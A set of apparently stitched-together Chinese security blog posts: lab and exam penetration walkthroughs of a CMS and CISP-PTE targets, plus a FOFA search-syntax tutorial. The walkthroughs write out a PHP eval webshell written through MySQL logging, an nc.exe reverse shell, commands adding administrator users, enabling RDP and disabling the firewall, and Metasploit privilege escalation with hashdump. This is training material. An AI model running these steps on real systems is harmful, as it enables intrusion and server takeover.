深入某CMS渗透测试：从弱口令到接管webshell 前言401验证，在网络通信和HTTP协议中，特指一种状态码——401 Unauthorized（未经授权）。当客户端尝试访问受保护的资源时，如果未能提供有效的身份验证信息，或者提供的信息不足以获得访问权限，服务器就会返回401状态码，表示请求未被授权。靶场复现弱口令123456当然也可以使用bp爆破base64解密添加迭代器，用户字典在这里添加一个冒号添加密码字典添加处理规则base64编码这里发现一个百分号的url编码，他就是我们401认证中间的冒号这里取消url编码即可然后进行爆破即可，找到一个响应为200的就是爆破成功的然后解密就好返回页面登录成功后就会得到key1进入到首页登录sql注入尝试，被验证了双引号也不行对搜索框进行xss攻击，发现对<>进行了过滤url编码，但是被转义成了script的a标签，还是以字符串的形式添加到相关搜索注册一个用户信息这里成功注册了，但是也没有alert(1)查看首页过来，也没有，修改闭合标签<strong>试试修改信息，并添加一个strong标签失败了，好像还有字符长度限制在短消息界面中尝试xss失败，没效果xss验证，被转义成了字符串</textarea><script>alert(1)</script>好家伙直接添加成功，也没有xss漏洞找到默认 织梦 后台管理地址管理员没有修改默认登录界面admin 万能密码绕过，没有效果查看端口开放信息这个端口也没有什么东西3306端口，mysql远程连接试试，拒绝远程连接robots爬虫协议/include/templets，都没发现什么东西找到头像设置界面，一句话图片马能上传了可以上传图片，但是找了好一会儿，没有找到文件包含的地方御剑目录扫描扫不出任何东西这里有一个认证，就是401认证，用普通的目录扫描工具是扫不出任何东西的Authorization: Basic YWRtaW46MTIzNDU2用burp suite扫描抓包指定好御剑的字典目录扫描路径刚刚扫描到的phpmyadmin这个错误介绍MySQL是一个流行的开放源代码关系数据库管理系统。它是许多Web应用程序的基础，例如WordPress，Magento和Drupal等。MySQL允许用户通过自己的主机或云服务器上的phpMyAdmin进行MySQL管理。然而，有时候用户可能会遇到MySQL Error # 1045 – Cannot Log in to MySQL server -> phpmyadmin错误。这篇文章将介绍这个错误，以及如何解决它。错误原因该错误通常意味着您没有权限访问MySQL服务器。在MySQL中有一个root用户，它是MySQL服务器的超级管理员。如果您尝试使用root用户登录MySQL服务器但不知道密码，或者尝试通过phpMyAdmin使用root用户但是密码错误，那么您就会遇到MySQL Error # 1045。此外，如果您使用的是不正确的用户名或密码，也会遇到此错误。弱口令root/root成功一、后台文件上传登录mysql，找到指定的数据表，查看admin密码解密admin/888888成功进入到了后台界面找到这个文件式管理器，找到key2查看这个key2上传php文件用nmap进行扫描扫出来结果为windows系统执行命令dir查看系统信息，是windows server 2008操作系统在当前uploads目录上传一个nc.exe移交cmd权限到攻击机器nc.exe [ip] [端口] -e cmddir查看是否成功查看用户权限信息，是超级管理员，那么我们就可以添加一个管理员用户添加用户，并添加到admin用户组# 添加一个用户 net user 用户名 password /add # 添加用户名到指定用户组 net localgroup administrators 用户名 /add开启远程wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1nmap扫描指定端口，查看是否开启用你刚刚添加的用户进行远程连接查看administrator目录，成功访问，获得目标服务器权限，这里环境没有配置key3，演示结束。二、日志写入phpmyadmin日志功能SHOW VARIABLES LIKE "%general%"这里我们查看日志状态是开启的，我们可以尝试写日志的方式，获取shell命令如果没有打开也可以使用如下脚本，打开日志功能SET GLOBAL GENERAL_LOG=on在上面我们看到了日志的路径，确定了本站为phpstudy搭建的，我们修改日志文件到我们的shell.php查看脚本是否存在写入日志SELECT "<?php @eval($_POST[10]); ?>"这里不要忘了添加401验证的请求头

信息收集：网络空间测绘FOFA，查询语法最全使用方法（图文解析） 前言经粉丝投稿，特意搜集了一些fofa的使用教程和一些高级用法什么是FOFA？官网描述：FOFA－网络空间资产搜索引擎是华顺信安推出的一款通过对全球网络对外开放服务的资产进行主动或被动方式探测、抓取、存储，分析整理不同种类的网络空间资产指纹信息（规则），并对符合规则的资产进行统计分析，进而快速检索全球网络空间资产的产品。它能够帮助用户迅速进行网络资产匹配，快速开展网络空间威胁态势感知、漏洞影响范围分析、应用分布统计、应用流行度排名统计等工作。查询语法表高级搜索逻辑连接符具体含义=匹配，=""时，可查询不存在字段或者值为空的情况。==完全匹配，==""时，可查询存在且值为空的情况。&&与||或!=不匹配，!=""时，可查询值不为空的情况。*=模糊匹配，使用或者?进行搜索，比如banner="mys??" (个人版及以上可用)。()确认查询优先级，括号内容优先级最高。基础类别标记类（Special Label）协议类 （type=service)网站类（type=subdomain）证书类地理位置（Location）时间类（Last update time）独立IP语法（独立IP系列语法，不可和上面其他语法共用）查询基础语法案例直接输入查询语句，将从标题，html内容，http头信息，url字段中搜索；html搜索我们找到某云的登录提示，因为文字在网页中皆属于html复制在fofa查询即可，发现还有其他的网站使用了关联的内容那么我们可以对国家进行筛选此时即可缩小查找的范围既然是html，那么我们这样搜索呢title标题搜索domain域名搜索如果查询表达式有多个与或关系，尽量在外面用()包含起来，比如这样。host主机名搜索host="主机名"os操作系统搜索os="操作系统"server服务器查询server="nginx"通过服务器进行查询org所属组织body搜索内容通过HTML正文进行查询js_name通过HTML正文中js进行查询headerheader="thinkphp"portport="3306"，找mysql的端口地址icpicp="备案号"status_codestatus_code="服务器状态码"protocolprotocol="协议类型" ，例如https/ssh/httpcountrycountry="国家编码"regionregion=“行政区” ，英文名称即可citycity=“城市”appapp="设备"基础常用语法就到这儿了，都看完了，那么再加个群和大佬们一起交流吧 =-=

cisp-pte考试靶场及通关攻略（附靶场源码） 靶机安装关注后回复【pte靶场】即可，有网安交流群，要进群的小伙伴后台加群即可vm启动后改静态ipservice network restart或者重启reboot第一题【sql注入】注意这个文件路径，待会要获取答案order by判断字段数量union判断，被过滤发现可以双写绕过空格被过滤使用/**/注释符替换空格，id=-1读取key第二题【文件上传】记下路径php3第三题【文件包含】第四题【命令执行】命令执行绕过可以用fufu大法查看源码第五题【日志分析】下载日志访问，爆破即可

CISP-PTE综合靶场解析，msf综合利用MS14-058【附靶场环境】 CISP-PTE综合靶场解析，msf综合利用MS14-058【附靶场环境】前言需要靶场的朋友们，可以在后台私信【pte靶场】，有网安学习群，可以关注后在菜单栏选择学习群加入即可信息收集题目要求：给定一个ip，找到3个KEY。nmap扫描，为了节省时间，这里改了端口，就不使用-p-全端口扫描了，源靶机在20000+端口扫描到这个端口进行访问御剑扫描有爬虫协议访问后台首页看看有没有git泄露，报了个iis报错界面，iis有web.config看看有没有备份文件，嗯，很好打开，看到了账号密码用sqlserver连接不知道为什么应该是系统问题使用pycharm专业版连接，指定好数据库，主机，账号，端口，密码后台回复【激活】即可获取 pycharm专业版 激活到2099的激活工具（仅限windows）有4张表找到管理员密码登录就好，找到了第一个keyweb漏洞利用文件上传，a都上传不了，说明是白名单，换思路这里开始分析这里我们看到这个管理上传文件，有一个aspx文件下载下来看看，这不是一句话木马嘛访查看源码问这个文件传参试试蚁剑连接查看系统信息查看系统配置，改密码，没有权限我们返回web目录，有一个key2key.key这个就是第二个key后渗透我们打开kali，并配置好桥接模式生成后门，并把这个payload记好，便签即可打开msfconsole，使用这个模块multi/handler由于生成的木马文件在kali里面，kali没有蚁剑，这时候我们就将后门传到本机，然后由本机传到靶机上，python3开启http服务本机访问这个kali的IP地址，这时候如果出现页面不可访问，那么大概率是防火墙没有放行8888端口，需要在kaili放行8888端口，命令参考sudo ufw allow 8888/tcp下载下来后，用蚁剑传文件到目标靶机上使用web虚拟shell执行后门反弹shell成功获取系统信息，没有权限提权1、ms14-058成功上线后，使用bg维持会话的同时继续执行其他模块，可以看到bg之后会生成一个session，记住这个session，使用search windows/local/ms14_058搜索模块，use 0指定payload模块为搜索到的第一个结果，使用ms14_058模块的时候，需要设置这个session为你刚刚上线成功的session，否则会导致执行不成功，run这里遇到个问题端口配置不正确该站点存在此漏洞，但是shell会话建立不成功，这个时候就是你的端口配置不对了，必须要是你msfvenom后门使用模块的指定端口，不然都会不成功重新设置端口为msfvenom设置的端口，网上大多数教程都没有详细介绍，只是走个过场，我自己也试过很多坑，才发现可以看到，提权成功了，使用hashdump查看用户hash密码解密hash密码开启3389远程连接run post/windows/manage/enable_rdp我们去网站根目录，还发现有个bak文件，2022-12-12打开，既然是我们sqlserver数据库超级管理员账户和密码利用这个sa账户，关掉防火墙用到 admin/mssql/mssql_exec模块执行成功，如果不关闭防火墙的话可能导致远程连接连接不上打开桌面2、手工得知sa账户密码后，使用sa登录获取系统命令，这时候发现，sa拥有system系统权限关闭防火墙netsh firewall set opmode mode="disable"开启3389远程连接wmic rdtoggle where servername="%computername%" call setallowtsconnections 1开启3389成功，在这里虽然没有用户密码，但是可以新建用户，然后远程登录，这里还有另外一种方法直接在命令行查找key